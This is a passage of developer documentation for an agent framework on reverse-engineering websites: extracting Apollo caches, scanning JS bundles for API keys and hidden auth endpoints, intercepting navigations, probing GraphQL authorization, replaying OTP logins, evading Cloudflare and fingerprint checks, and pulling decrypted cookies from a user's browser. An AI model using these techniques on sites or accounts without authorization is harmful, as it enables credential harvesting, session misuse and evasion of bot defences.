Why not Playwright? Playwright’s bundled Chromium has a detectable TLS fingerprint. Sites like Amazon and Cloudflare-protected services reject it. CDP to a real browser produces authentic fingerprints and uses existing sessions. See Transport.
Next.js + Apollo Cache Extraction
Many modern sites (Goodreads, Airbnb, etc.) use Next.js with Apollo Client. These pages ship a full serialized Apollo cache in the HTML — structured entity data that you can parse without scraping visible HTML.
Where to find it
<script id="__NEXT_DATA__" type="application/json">{ ... }</script>
Inside that JSON:
__NEXT_DATA__
.props.pageProps
.props.pageProps.apolloState <-- the gold
.props.pageProps.apolloState.ROOT_QUERY
How Apollo normalized cache works
Apollo stores GraphQL results as a flat dictionary keyed by entity type and ID.
Related entities are stored as {"__ref": "Book:kca://book/..."} pointers.
import json, re

def extract_next_data(html: str) -> dict:
    match = re.search(
        r'<script id="__NEXT_DATA__" type="application/json">(.*?)</script>',
        html, re.S,
    )
    if not match:
        raise RuntimeError("No __NEXT_DATA__ found")
    return json.loads(match.group(1))

def deref(apollo: dict, value):
    """Resolve Apollo __ref pointers to their actual objects."""
    if isinstance(value, dict) and "__ref" in value:
        return apollo.get(value["__ref"])
    return value
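Lists of refs are common too, so a recursive variant can save repeated deref calls. This is a hedged sketch, not part of any skill, and it does not guard against reference cycles that can appear in real caches:

```python
def deref_all(apollo: dict, value):
    """Recursively resolve __ref pointers, including inside dicts and lists.

    Naive sketch: assumes the subgraph being resolved is acyclic.
    """
    if isinstance(value, dict):
        if "__ref" in value:
            return deref_all(apollo, apollo.get(value["__ref"]))
        return {k: deref_all(apollo, v) for k, v in value.items()}
    if isinstance(value, list):
        return [deref_all(apollo, v) for v in value]
    return value
```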
Extraction pattern
next_data = extract_next_data(html)
apollo = next_data["props"]["pageProps"]["apolloState"]
root_query = apollo["ROOT_QUERY"]
# Find the entity by its query key
book_ref = root_query['getBookByLegacyId({"legacyId":"4934"})']
book = apollo[book_ref["__ref"]]
# Dereference related entities
work = deref(apollo, book.get("work"))
primary_author = deref(apollo, book.get("primaryContributorEdge", {}).get("node"))
What you typically find in the Apollo cache
| Entity type | Common fields |
|---|---|
| Books | title, description, imageUrl, webUrl, legacyId, details (isbn, pages, publisher) |
| Contributors | name, legacyId, webUrl, profileImageUrl |
| Works | stats (averageRating, ratingsCount), details (originalTitle, publicationTime) |
| Social signals | shelf counts (CURRENTLY_READING, TO_READ) |
| Genres | name, webUrl |
| Series | title, webUrl |
The Apollo cache often contains more data than the visible page renders. Always
dump and inspect apolloState before assuming you need to make additional API calls.
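A quick inventory by entity type makes the dump easier to scan (a small illustrative helper; cache keys follow the `Type:id` convention shown above):

```python
from collections import Counter

def apollo_inventory(apollo: dict) -> Counter:
    """Count cache entries by entity type (the part before the first ':')."""
    return Counter(key.split(":")[0] for key in apollo if key != "ROOT_QUERY")
```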
Real example: Goodreads
See skills/goodreads/public_graph.py functions load_book_page() and
map_book_payload() for a complete implementation that extracts 25+ fields from
the Apollo cache without any GraphQL calls.
JS Bundle Scanning
SPAs embed everything in their JavaScript bundles — config values, API keys, custom endpoints, and auth flow logic. Scanning bundles is one of the highest-value reverse-engineering techniques. It works without login, reveals hidden endpoints that network capture misses, and exposes the exact contracts the frontend uses.
Two levels of bundle scanning
Level 1: Config extraction — find API keys, endpoints, tenant IDs. Standard search for known patterns.
Level 2: Endpoint and flow discovery — find custom API endpoints that
aren’t in the standard framework (e.g. /api/verify-otp), understand what
parameters they accept, and how the frontend processes the response. This
is how you crack custom auth flows.
General pattern
import re, httpx
from urllib.parse import urljoin

def scan_bundles(page_url: str, search_terms: list[str]) -> dict:
    """Fetch a page, extract all JS bundle URLs, scan each for search terms."""
    with httpx.Client(http2=False, follow_redirects=True, timeout=30) as client:
        html = client.get(page_url).text
        # Extract all JS chunk URLs (Next.js / Turbopack pattern)
        js_urls = list(set(re.findall(
            r'["\'](/_next/static/[^"\' >]+\.js[^"\' >]*)', html
        )))
        results = {}
        for url in js_urls:
            js = client.get(urljoin(page_url, url)).text
            for term in search_terms:
                if term.lower() in js.lower():
                    # Extract context around the first match
                    idx = js.lower().find(term.lower())
                    context = js[max(0, idx - 100):idx + 200]
                    results.setdefault(term, []).append({
                        "chunk": url[-40:],
                        "size": len(js),
                        "context": context,
                    })
        return results
Config patterns to search for
| What | Search terms |
|---|---|
| API keys | apiKey, api_key, X-Api-Key, widgetsApiKey |
| GraphQL endpoints | appsync-api, graphql |
| Tenant / namespace | host.split, subdomain |
| Cognito credentials | userPoolId, userPoolClientId |
| Auth endpoints | AuthFlow, InitiateAuth, cognito-idp |
Custom endpoint patterns to search for
| What | Search terms |
|---|---|
| Custom auth flows | verify-otp, verify-code, verify-token, confirm-code |
| Hidden API routes | fetch(, /api/ |
| Token construction | callback/email, hashedOtp, rawOtp, token= |
| Form submission handlers | submit, handleSubmit, onSubmit |
How we cracked Exa’s custom OTP flow
Exa’s login page uses a custom 6-digit OTP system built on top of NextAuth.
The standard NextAuth callback failed with error=Verification. Scanning
the JS bundles revealed the actual flow:
# Search terms that found the hidden endpoint
results = scan_bundles("https://auth.exa.ai", ["verify-otp", "verify-code", "callback/email"])
In a 573KB chunk, this surfaced:
fetch("/api/verify-otp", {method: "POST", headers: {"Content-Type": "application/json"},
body: JSON.stringify({email: e.toLowerCase(), otp: r})})
// → response: {email, hashedOtp, rawOtp}
// → constructs: token = hashedOtp + ":" + rawOtp
// → redirects to: /api/auth/callback/email?token=...&email=...
This revealed the entire auth flow — custom endpoint, request/response shape, and token construction — all from static JS analysis.
Multi-environment configs
Many sites ship all environment configs in the same bundle. Goodreads ships four AppSync configurations with labeled environments:
{"graphql":{"apiKey":"da2-...","endpoint":"https://...appsync-api...amazonaws.com/graphql","region":"us-east-1"},"showAds":false,"shortName":"Dev"}
{"graphql":{"apiKey":"da2-...","endpoint":"https://...appsync-api...amazonaws.com/graphql","region":"us-east-1"},"showAds":false,"shortName":"Beta"}
{"graphql":{"apiKey":"da2-...","endpoint":"https://...appsync-api...amazonaws.com/graphql","region":"us-east-1"},"showAds":true,"shortName":"Preprod"}
{"graphql":{"apiKey":"da2-...","endpoint":"https://...appsync-api...amazonaws.com/graphql","region":"us-east-1"},"showAds":true,"shortName":"Prod"}
Pick the right one by looking for identifiers like shortName, showAds: true,
publishWebVitalMetrics: true, or simply taking the last entry (Prod is typically
last in webpack build output).
The “Authorization is the namespace” pattern
Some APIs use the Authorization header not for a JWT but for a tenant namespace
extracted from the subdomain at runtime:
Jl = () => host.split(".")[0] // -> "boulderingproject"
headers: { Authorization: Jl(), "X-Api-Key": widgetsApiKey }
If you see Authorization values that seem too short to be JWTs, look for the
function that generates them near the axios/fetch client factory in the bundle.
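In Python the same construction is tiny. Names here are illustrative, mirroring the minified Jl() helper above; widgets_api_key stands in for whatever key the bundle exposes:

```python
def tenant_headers(host: str, widgets_api_key: str) -> dict:
    """Build the 'Authorization is the namespace' header pair from a tenant subdomain."""
    return {"Authorization": host.split(".")[0], "X-Api-Key": widgets_api_key}
```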
Real examples
- Goodreads: skills/goodreads/public_graph.py discover_from_bundle() — extracts the Prod AppSync config from the _app chunk
- Austin Boulder Project: skills/austin-boulder-project/abp.py — API key and namespace from the Tilefive bundle
Navigation API Interception
When JS bundle scanning reveals what endpoint gets called but not what happens with the result (e.g. a client-side token construction), you need to see the actual values the browser produces. The Navigation API interceptor is the key technique.
The problem
Client-side JS often does: fetch → process response → set window.location.href.
Once the navigation fires, the page is gone and you can’t inspect the URL. Network
capture only catches the fetch, not the outbound navigation. And the processing
logic is buried in minified closures you can’t easily call.
The solution
Modern Chrome exposes the Navigation API.
You can intercept navigation attempts, capture the destination URL, and prevent
the actual navigation — all with a single evaluate call:
evaluate { script: "navigation.addEventListener('navigate', (e) => { window.__intercepted_nav_url = e.destination.url; e.preventDefault(); }); 'interceptor installed'" }
Then trigger the action (click a button, submit a form), and read the captured URL:
click { selector: "button#submit" }
evaluate { script: "window.__intercepted_nav_url" }
The URL contains whatever the client-side JS constructed — tokens, hashes, callback parameters — fully assembled and ready to replay with HTTPX.
When to use this
| Situation | Technique |
|---|---|
| Button click makes a fetch() call | Fetch interceptor (see 3-auth) |
| Button click causes a page navigation | Navigation API interceptor |
| Form does a native POST (page reloads) | Inspect the <form> action + inputs |
| JS constructs a URL and redirects | Navigation API interceptor |
Real example: Exa OTP verification
The Exa auth page’s “VERIFY CODE” button calls /api/verify-otp, gets back
{hashedOtp, rawOtp}, then does window.location.href = callback_url_with_token.
The Navigation API interceptor captured the full callback URL, revealing the
token format is {bcrypt_hash}:{raw_code}.
This technique turned a “Playwright required” flow into a fully HTTPX-replayable one. See NextAuth OTP flow.
Combining with fetch interception
For complete visibility, install both interceptors before triggering an action:
// Capture all fetch calls AND navigations
window.__cap = { fetches: [], navigations: [] };

// Fetch interceptor
const origFetch = window.fetch;
window.fetch = async (...args) => {
  const r = await origFetch(...args);
  const c = r.clone();
  window.__cap.fetches.push({
    url: typeof args[0] === 'string' ? args[0] : args[0]?.url,
    status: r.status,
    body: (await c.text()).substring(0, 3000),
  });
  return r;
};

// Navigation interceptor
navigation.addEventListener('navigate', (e) => {
  window.__cap.navigations.push(e.destination.url);
  e.preventDefault();
});
Read everything after: evaluate { script: "JSON.stringify(window.__cap)" }
Read the Source
When bundle scanning and interception give you the what but not the why, go read the library’s source code. This is especially valuable for well-known frameworks (NextAuth, Supabase, Clerk, Auth0) where the source is on GitHub.
Why this matters
Minified bundle code tells you what the client does. The library source tells you what the server expects. These are two halves of the same flow.
Example: NextAuth email callback
Bundle scanning revealed Exa calls /api/auth/callback/email?token=.... But
what does the server do with that token? Reading the
NextAuth callback source
revealed the critical line:
token: await createHash(`${paramToken}${secret}`)
The server SHA-256 hashes token + NEXTAUTH_SECRET and compares with the
database. This told us the token format must be stable and deterministic — it
can’t be a random value. Combined with the Navigation API interception that
showed token = hashedOtp:rawOtp, we had the complete picture.
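Assuming createHash is a SHA-256 hex digest over token + secret (verify against the NextAuth version the site actually pins, since this has changed across releases), the server-side check reproduces in a few lines:

```python
import hashlib

def hash_token(param_token: str, secret: str) -> str:
    """Sketch of NextAuth's createHash(`${token}${secret}`): SHA-256 hex digest."""
    return hashlib.sha256(f"{param_token}{secret}".encode()).hexdigest()
```

This is how you can pre-verify a constructed token locally before replaying the callback, given a known secret in a test environment.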
When to read the source
| Signal | Action |
|---|---|
| Standard framework (NextAuth, Supabase, etc.) | Read the auth callback handler source |
| Custom error messages (e.g. error=Verification) | Search the library source for that error string |
| Token/hash format is unclear | Read the token verification logic |
| Framework does something “impossible” | The source always reveals how |
Where to find it
- NextAuth: github.com/nextauthjs/next-auth/tree/main/packages/core/src
- Supabase: github.com/supabase/auth
- Clerk: github.com/clerk/javascript
- Auth0: github.com/auth0/nextjs-auth0
Search the repo for the endpoint path (e.g. callback/email) or error message
(e.g. Verification) to find the relevant handler quickly.
GraphQL Schema Discovery via JS Bundles
Production GraphQL endpoints almost never allow introspection queries. But the frontend JS bundles contain every query and mutation the app uses.
Technique: scan all JS chunks for operation names
import re, httpx

def discover_graphql_operations(html: str, base_url: str) -> set[str]:
    """Find all GraphQL operation names from the frontend JS bundles."""
    chunks = re.findall(r'(/_next/static/chunks/[a-zA-Z0-9/_%-]+\.js)', html)
    operations = set()
    for chunk in chunks:
        js = httpx.get(f"{base_url}{chunk}").text
        # Find query/mutation declarations
        for m in re.finditer(r'(?:query|mutation)\s+([A-Za-z_]\w*)\s*[\(\{]', js):
            operations.add(m.group(1))
    return operations
What this finds
On Goodreads, scanning 18 JS chunks revealed 38 operations:
Queries (public reads): getReviews, getSimilarBooks, getSearchSuggestions,
getWorksByContributor, getWorksForSeries, getComments, getBookListsOfBook,
getSocialSignals, getWorkCommunityRatings, getWorkCommunitySignals, …
Queries (auth required): getUser, getViewer, getEditions,
getSocialReviews, getWorkSocialReviews, getWorkSocialShelvings, …
Mutations: RateBook, ShelveBook, UnshelveBook, TagBook, Like,
Unlike, CreateComment, DeleteComment
Extracting full query strings
Once you know the operation name, extract the full query with its variable shape:
def extract_query(js: str, operation_name: str) -> str | None:
    idx = js.find(f"query {operation_name}")
    if idx == -1:
        return None
    snippet = js[idx:idx + 3000]
    depth = 0
    for i, c in enumerate(snippet):
        if c == "{":
            depth += 1
        elif c == "}":
            depth -= 1
            if depth == 0:
                return snippet[:i + 1].replace("\\n", "\n")
    return None
This gives you copy-pasteable GraphQL documents you can replay directly via HTTP POST.
Real example: Goodreads
See skills/goodreads/public_graph.py for the full set of proven GraphQL queries
including getReviews, getSimilarBooks, getSearchSuggestions,
getWorksForSeries, and getWorksByContributor.
Public vs Auth Boundary Mapping
After discovering operations, you need to determine which ones work anonymously (with just the public API key) and which require user session auth.
Technique: probe each operation and classify the error
Send each discovered operation to the public endpoint and classify the response:
| Response | Meaning |
|---|---|
| 200 with data | Public, works anonymously |
| 200 with errors: ["Not Authorized to access X on type Y"] | Partially public — the operation works but specific fields are viewer-scoped. Remove the blocked field and retry. |
| 200 with errors: ["MappingTemplate" / VTL error] | Requires auth — the AppSync resolver needs session context to even start |
| 403 or 401 | Requires auth at the transport level |
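The classification can be mechanized. A hedged sketch that buckets a probe response per the table (error shapes vary by AppSync setup, so treat the string matches as heuristics):

```python
def classify_operation(status: int, body: dict) -> str:
    """Bucket a GraphQL probe response: public, partial, or auth-required."""
    if status in (401, 403):
        return "auth_required_transport"
    errors = body.get("errors") or []
    messages = " ".join(e.get("message", "") + e.get("errorType", "") for e in errors)
    if not errors and body.get("data"):
        return "public"
    if "MappingTemplate" in messages:
        return "auth_required_resolver"
    if "Not Authorized to access" in messages:
        return "partially_public"
    return "unknown"
```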
AppSync VTL errors as a signal
AWS AppSync uses Velocity Template Language (VTL) resolvers. When a public request hits an auth-gated resolver, you get a distinctive error:
{
"errorType": "MappingTemplate",
"message": "Error invoking method 'get(java.lang.Integer)' in [Ljava.lang.String; at velocity[line 20, column 55]"
}
This means: “the resolver tried to read user context from the auth token and failed.” It reliably indicates the operation needs authentication.
Field-level authorization
GraphQL auth on AppSync is often field-level, not operation-level. A getReviews
query might work but including viewerHasLiked returns:
{ "message": "Not Authorized to access viewerHasLiked on type Review" }
The fix: remove the viewer-scoped field from your query. The rest works fine publicly.
Goodreads boundary scorecard
| Operation | Public? | Notes |
|---|---|---|
| getSearchSuggestions | Yes | Book search by title/author |
| getReviews | Yes | Except viewerHasLiked and viewerRelationshipStatus |
| getSimilarBooks | Yes | |
| getWorksForSeries | Yes | Series book listings |
| getWorksByContributor | Yes | Needs internal contributor ID (not legacy author ID) |
| getUser | No | VTL error — needs session |
| getEditions | No | VTL error — needs session |
| getViewer | No | Viewer-only by definition |
| getWorkSocialShelvings | Partial | May need session for full data |
Heterogeneous Page Stacks
Large sites migrating to modern frontends have mixed page types. You need to identify which pages use which stack and adjust your extraction strategy.
How to identify the stack
| Signal | Stack |
|---|---|
| <script id="__NEXT_DATA__"> in HTML | Next.js (server-rendered, may have Apollo cache) |
| GraphQL/AppSync XHR traffic after page load | Modern frontend with GraphQL backend |
| No __NEXT_DATA__, classic <div> structure, <meta> tags | Legacy server-rendered HTML |
| window.__INITIAL_STATE__ or similar | React SPA with custom state hydration |
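A heuristic classifier over these signals (sketch only; real pages can mix signals, so check in the order shown and verify by eye):

```python
def detect_stack(html: str) -> str:
    """Classify a page's frontend stack from its raw HTML (heuristic)."""
    if '<script id="__NEXT_DATA__"' in html:
        return "nextjs"
    if "window.__INITIAL_STATE__" in html:
        return "spa_custom_hydration"
    return "legacy_html"
```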
Goodreads example
| Page type | Stack | Extraction strategy |
|---|---|---|
| Book pages (/book/show/) | Next.js + Apollo + AppSync | __NEXT_DATA__ for main data, GraphQL for reviews/similar |
| Author pages (/author/show/) | Legacy HTML | Regex scraping |
| Profile pages (/user/show/) | Legacy HTML | Regex scraping |
| Search pages (/search) | Legacy HTML | Regex scraping |
Strategy: use structured extraction where available, fall back to HTML only where the site hasn’t migrated yet. As the site migrates pages, move your extractors to match.
Legacy HTML Scraping
When a page has no structured data surface, regex scraping is the fallback.
Principles
- Prefer specific anchors (IDs, class names, itemprop attributes) over positional matching
- Use re.S (dotall) for multi-line HTML patterns
- Extract sections first, then parse within the section to reduce false matches
- Always strip and unescape HTML entities
Section extraction pattern
def section_between(html: str, start_marker: str, end_marker: str) -> str:
    start = html.find(start_marker)
    if start == -1:
        return ""
    end = html.find(end_marker, start)
    return html[start:end] if end != -1 else html[start:]
When to stop scraping
If you find yourself writing regex patterns longer than 3 lines, consider:
- Is there a __NEXT_DATA__ payload you missed?
- Does the page make XHR calls you could replay directly?
- Can you use a headless browser to get the rendered DOM instead?
HTML scraping should be the strategy of last resort, not the first attempt.
Real-World Examples in This Repo
| Skill | Discovery technique | Reference |
|---|---|---|
| skills/exa/ | JS bundle scanning for the custom /api/verify-otp endpoint + Navigation API interception for the token format + reading NextAuth source for server-side verification logic | exa.py, nextauth.md |
| skills/goodreads/ | Next.js Apollo cache + AppSync GraphQL + JS bundle scanning | public_graph.py |
| skills/austin-boulder-project/ | JS bundle config extraction (API key + namespace) | abp.py |
| skills/claude/ | Session cookie capture via Playwright | claude-login.py |
Reverse Engineering — Auth & Credentials
How to log into things, get API keys, and store credentials — for any web service.
This is Layer 3 of the reverse-engineering docs:
- Layer 1: Transport — 1-transport
- Layer 2: Discovery — 2-discovery
- Layer 3: Auth & Credentials (this file)
- nextauth.md — NextAuth.js / Auth.js deep dive
- workos.md — WorkOS auth pattern
- Layer 4: Content — 4-content
- Layer 5: Social Networks — 5-social
- Layer 6: Desktop Apps — 6-desktop-apps
How web auth works
Every web login — from a 2005 PHP app to a 2026 Next.js SPA — does the same three things:
- You prove who you are (type a password, click a link, enter a code)
- The server gives you a cookie (session token, JWT, whatever)
- You send that cookie with every request
That’s it. The mechanism varies — form POSTs, fetch calls, OAuth redirects — but the end result is always a cookie in your browser.
The two submission patterns
When you click “Submit” on a login form, one of two things happens:
Form POST (the classic). The browser sends an HTML form POST, the server responds with a redirect (302), and the browser follows it. Cookies get set along the way. This is the oldest pattern on the web and still used everywhere, including modern frameworks like NextAuth.
Browser: POST /login { email, password }
Server: 302 → /dashboard (Set-Cookie: session=abc123)
Browser: GET /dashboard (Cookie: session=abc123)
Fetch/XHR (the SPA way). JavaScript makes an async request, the page stays loaded, and the response is handled in JS. The page might update without a full navigation.
JS: fetch('/api/login', { method: 'POST', body: { email, password } })
Server: 200 { token: "abc123" }
JS: stores token, updates UI
Both are straightforward. When reverse engineering, you just need to figure out which one a site uses, then replay it.
Cookies
A cookie is a name-value pair the server sends with Set-Cookie and the
browser sends back with every request. The attributes control where and how:
| Attribute | What it means | HTTP client impact |
|---|---|---|
| HttpOnly | JS can’t read it | Doesn’t affect agentos.http (only matters in browsers) |
| Secure | HTTPS only | Use https:// URLs |
| SameSite=Lax | Sent on navigations, not cross-site POSTs | agentos.http sends it normally |
| Domain=.example.com | Works on all subdomains | Important when auth and dashboard are on different subdomains. The engine uses RFC 6265 domain matching to filter cookies by the host from connection.base_url |
| Expiry | Session (until browser close) or persistent (date) | agentos.http doesn’t care — just send the cookie |
Cross-domain cookies: When auth lives at auth.exa.ai and the dashboard
at dashboard.exa.ai, the session cookie is scoped to .exa.ai so both
subdomains can use it. When extracting cookies, always check the domain —
.exa.ai works everywhere, auth.exa.ai only works on auth.
CSRF tokens
Sites protect against forged requests by requiring a CSRF token — a secret value the server generates and the client must include in form submissions.
The pattern is always the same:
- Fetch the token (from an endpoint, a meta tag, a hidden form field, or a cookie)
- Include it in your POST (as a form field, header, or both)
csrf = client.get("/api/auth/csrf").json()["csrfToken"]
client.post("/api/auth/signin/email", data={"email": email, "csrfToken": csrf})
The token and cookie must come from the same request. If you fetch the token with one HTTPX client and try to use it with another, the server will reject it because the CSRF cookie doesn’t match.
Where to find CSRF tokens during discovery:
# API endpoint (NextAuth)
evaluate { script: "fetch('/api/auth/csrf').then(r=>r.json()).then(d=>JSON.stringify(d))" }
# Meta tag
evaluate { script: "document.querySelector('meta[name=csrf-token]')?.content" }
# Hidden form fields
evaluate { script: "JSON.stringify(Array.from(document.querySelectorAll('input[type=hidden]')).map(i => ({name: i.name, value: i.value.substring(0,20)+'...'})))" }
The credential bootstrap
This is the end-to-end flow for getting credentials from a web dashboard. Every dashboard skill follows these five steps.
1. Navigate to the dashboard
Go to the dashboard URL (not the auth URL directly). The dashboard redirects to auth with the right callback URL.
get_webpage { url: "https://dashboard.example.com", wait_until: "domcontentloaded" }
# → redirects to https://auth.example.com/?callbackUrl=https://dashboard.example.com/
If it lands on a Cloudflare challenge page, that’s fine — the Playwright
browser solves it automatically and you get a cf_clearance cookie.
2. Figure out how to log in
Check what login methods are available:
evaluate { script: "fetch('/api/auth/providers').then(r=>r.json()).then(d=>JSON.stringify(Object.keys(d)))" }
Inspect the form:
inspect { selector: "form" }
This tells you:
- Email + code → usually fully replayable with agentos.http (see below)
- Email + password → replay entirely with agentos.http
- Google/GitHub OAuth → Playwright for the consent screen, then cookies
- SSO (WorkOS, Okta) → see vendor guides
3. Complete the login
Try agentos.http first. Many email+code flows that appear browser-only are
actually fully replayable. The key technique is scanning the JS bundles for custom
verification endpoints (e.g. /api/verify-otp) and using the Navigation API
interceptor to discover token formats. See
Discovery: JS Bundle Scanning and
Discovery: Navigation API Interception.
from agentos import http
# Example: Exa email+code login — no browser needed
# 1. Trigger code email
with http.client() as client:
    csrf_token = client.get(f"{AUTH_BASE}/api/auth/csrf").json()["csrfToken"]
    client.post(f"{AUTH_BASE}/api/auth/signin/email", data={"email": email, "csrfToken": csrf_token, ...})

    # 2. Agent reads code from email (Gmail, etc.)

    # 3. Verify code via custom endpoint
    resp = client.post(f"{AUTH_BASE}/api/verify-otp", json={"email": email, "otp": code})
    data = resp.json()  # {hashedOtp, rawOtp}
    token = f"{data['hashedOtp']}:{data['rawOtp']}"

    # 4. Hit the standard callback with the constructed token
    client.get(f"{AUTH_BASE}/api/auth/callback/email?token={token}&email={email}&callbackUrl=...")
    # → session cookie is now set on the client
Fall back to Playwright only for flows that genuinely require a browser
(Google OAuth consent screens, CAPTCHAs, or complex multi-step redirects).
Use type (not fill) for input fields on React forms.
If the login involves a verification code from email, the agent checks email between steps.
4. Grab the cookies
cookies { domain: ".example.com" }
You want the session cookie (usually next-auth.session-token, session,
auth_token, etc.) and optionally cf_clearance for Cloudflare.
Validate it works:
from agentos import http
with http.client(cookies={"next-auth.session-token": token}) as client:
session = client.get("https://dashboard.example.com/api/auth/session").json()
assert session.get("user"), "Session invalid"
5. Hit the dashboard APIs
Navigate to the API keys page and capture what the frontend calls:
capture_network { url: "https://dashboard.example.com/api-keys", pattern: "**/api/**", wait: 5000 }
This typically reveals endpoints for:
- Listing API keys
- Team/org info (rate limits, billing, usage)
- User profile
Always read the full API response. Dashboards mask values in the UI
(showing 9d2e4b••••••) but the API often returns them in full. Exa’s
/api/get-api-keys returns the complete API key as the id field — the UI
masking is purely client-side.
6. Store credentials
Return them via __secrets__ so the engine stores them securely:
return {
"__secrets__": [{
"issuer": "api.example.com",
"identifier": email,
"item_type": "api_key",
"label": "Example API Key",
"source": "example-skill",
"value": {"key": api_key},
"metadata": {
"masked": {"key": api_key[:6] + "••••••••"},
"dashboard_url": "https://dashboard.example.com/api-keys",
},
}],
"__result__": {"status": "authenticated", "identifier": email},
}
The engine writes to the credential store, creates an account entity on the
graph, and strips __secrets__ before the response reaches the agent.
Observing network traffic
Three tools, each for a different situation.
capture_network — what the page calls on load
Navigate to a URL and record all fetch/XHR traffic for a few seconds.
capture_network { url: "https://dashboard.exa.ai/api-keys", pattern: "**/api/**", wait: 5000 }
Use this to discover dashboard APIs, auth endpoints, and data shapes. Good patterns to filter with:
"**/api/**" REST APIs
"**graphql**" GraphQL endpoints
"**appsync-api**" AWS AppSync
Fetch interceptor — what a button click triggers
When you need to see what happens after a user interaction (like clicking “Create Key”), inject this before clicking:
evaluate { script: "window.__cap = []; const orig = window.fetch; window.fetch = async (...a) => { const req = { url: typeof a[0]==='string' ? a[0] : a[0]?.url, method: a[1]?.method||'GET' }; const r = await orig(...a); const c = r.clone(); req.status = r.status; req.body = (await c.text()).substring(0,3000); window.__cap.push(req); return r; }; 'ok'" }
click { selector: "button#create-key" }
evaluate { script: "JSON.stringify(window.__cap)" }
Form inspection — what a form POST sends
If the fetch interceptor captures nothing but the browser navigated somewhere new, the form did a native POST (full page navigation). Just inspect the form to see what it sends:
evaluate { script: "JSON.stringify(Array.from(document.querySelectorAll('form')).map(f => ({ action: f.action, method: f.method, inputs: Array.from(f.querySelectorAll('input')).map(i => ({ name: i.name, type: i.type, value: i.value ? '(has value)' : '(empty)' })) })))" }
This gives you the action URL, the method, and all input fields including
hidden ones (CSRF tokens, honeypots).
After the form submits, the browser lands on a new page. Check where you ended
up (url) and grab the cookies (cookies { domain: "..." }). That’s all
you need — the form POST did its job and set the session cookies.
Quick reference
Page load traffic? → capture_network
Button click / async? → Fetch interceptor
Nothing captured + URL changed? → Native form POST — inspect the <form>, then just grab the cookies after
Replaying with agentos.http
Once you understand what the browser does, replay it with agentos.http. The
goal is to get the same cookies without a browser.
Skills use agentos.http for all HTTP — never raw httpx/requests/urllib.
The http.headers() function builds the right header set for each request
type, and the engine sets zero default headers — Python controls them all.
Form POSTs
from agentos import http
headers = http.headers(mode="navigate") # browser-like headers for form POSTs
with http.client(headers=headers) as client:
resp = client.post("https://auth.example.com/api/auth/login", data={
"email": email,
"password": password,
"csrfToken": csrf_token,
})
session_cookies = dict(client.cookies)
http.client() follows redirects by default and handles the redirect chain
automatically — same as the browser. The cookies accumulate on the client.
Fetch/XHR calls
from agentos import http
headers = http.headers(accept="json") # API-appropriate headers
with http.client(headers=headers) as client:
resp = client.post("https://api.example.com/auth/login", json={
"email": email, "password": password
})
token = resp.json()["token"]
http.headers() knobs
The http.headers() function replaces the old profile= parameter. It builds
headers from explicit knobs — the engine sets nothing by default:
| Knob | What it does | Example |
|---|---|---|
| waf= | Anti-bot headers (User-Agent, client hints) | http.headers(waf="cloudflare") |
| accept= | Accept header type | http.headers(accept="json"), http.headers(accept="html") |
| mode= | Fetch mode / navigation headers | http.headers(mode="navigate") |
| extra= | Additional headers to merge | http.headers(extra={"X-Custom": "val"}) |
These compose: http.headers(waf="cloudflare", accept="json", mode="cors").
When replay doesn’t work
Sometimes the server does something specific to browser requests that
agentos.http can’t replicate (custom redirect handling, Cloudflare challenges,
JS-dependent cookie setting). When that happens:
- Use Playwright for that step. Let the browser handle it.
- Extract the cookies from Playwright after.
- Use agentos.http for everything else (dashboard APIs, data extraction, etc.)
This isn’t a workaround — it’s the right architecture. Playwright handles the
login, agentos.http handles the work. Each tool does what it’s good at.
| Situation | Solution |
|---|---|
| Standard form POST or API call | agentos.http replay |
| Custom OTP/code verification | Scan JS bundles for custom endpoints → agentos.http replay (see discovery) |
| Google OAuth consent screen | Playwright first login → cookies → agentos.http after |
| Cloudflare JS challenge | Playwright or brave-browser.cookie_get for cf_clearance |
| Vercel Security Checkpoint (429) | http.client(http2=False) — purely a JA4 fingerprint issue |
| CAPTCHA | Cookies from user’s real browser session |
| Unknown client-side token construction | Navigation API interceptor → read the actual URL (see discovery) |
Cookie injection from real browsers
The fastest way to do authenticated discovery. When the user is already
logged into a site in Brave/Firefox, skip the login flow entirely — extract
cookies from their real browser and inject them into Playwright or agentos.http.
The pattern
# 1. Get decrypted cookies from the user's browser
brave-browser.cookie_get({ domain: "goodreads.com" })
# → returns { cookies: [{name, value, domain, path, httpOnly, secure, ...}], count: 13 }
# 2a. Inject into Playwright for visual discovery
playwright.capture_network({
url: "https://www.goodreads.com/friend/find_friend",
cookies: [
{ name: "_session_id2", value: "443a469...", domain: "www.goodreads.com", path: "/" },
{ name: "at-main", value: "Atza|gQCkt...", domain: ".goodreads.com", path: "/" },
...
],
pattern: "**friend**",
wait: 5000
})
# → page loads authenticated, you can inspect/interact
# 2b. OR use http.client(cookies=...) for direct calls
from agentos import http
client = http.client(cookies={"_session_id2": "443a469...", "at-main": "Atza|gQCkt..."})
Why this matters
- No login flow needed. The user is already logged in. Don’t waste time reverse-engineering auth when you just need to see what a page looks like.
- Real session state. You get the exact cookies the browser has — including HttpOnly cookies, auth tokens, and CSRF state that would be hard to reproduce.
- Playwright stays authenticated. After injecting cookies into capture_network or goto, the Playwright browser session keeps them. Subsequent click, fill, inspect calls stay logged in.
Cookie jar vs raw Cookie header
When making multi-step requests (e.g., fetch a form page, then submit
it), use http.client(cookies=...) instead of a raw Cookie header:
from agentos import http
# WRONG — raw header doesn't track Set-Cookie responses
client = http.client(headers={"Cookie": cookie_header})
# Step 1 may set a new _session_id2, but step 2 sends the OLD one
# RIGHT — cookie jar tracks Set-Cookie automatically
client = http.client(cookies={"_session_id2": "abc123", "at-main": "Atza|..."})
# Step 1's Set-Cookie is carried to step 2
This is critical when CSRF tokens (like Goodreads’ n= param) are tied to
the session cookie. If step 1 refreshes the session cookie but step 2 sends
the stale one, the server silently ignores the request.
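Under the hood this is plain cookie-jar semantics. A stdlib sketch of what http.client(cookies=...) does for you on every response; merge_set_cookie is a hypothetical helper, not part of agentos.http:

```python
from http.cookies import SimpleCookie

def merge_set_cookie(jar: dict, set_cookie_header: str) -> dict:
    """Merge one Set-Cookie response header into a dict-based cookie jar."""
    parsed = SimpleCookie()
    parsed.load(set_cookie_header)
    for name, morsel in parsed.items():
        jar[name] = morsel.value  # later Set-Cookie wins over the stale value
    return jar

# Step 1's response rotates the session cookie; the jar picks it up,
# so step 2 sends the fresh value instead of the stale one.
jar = {"_session_id2": "stale-abc", "at-main": "Atza|..."}
merge_set_cookie(jar, "_session_id2=fresh-xyz; Path=/; HttpOnly")
```

A raw Cookie header skips this merge step entirely, which is exactly why step 2 ends up sending the old session value.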
Available cookie providers
| Provider | Tool | Notes |
|---|---|---|
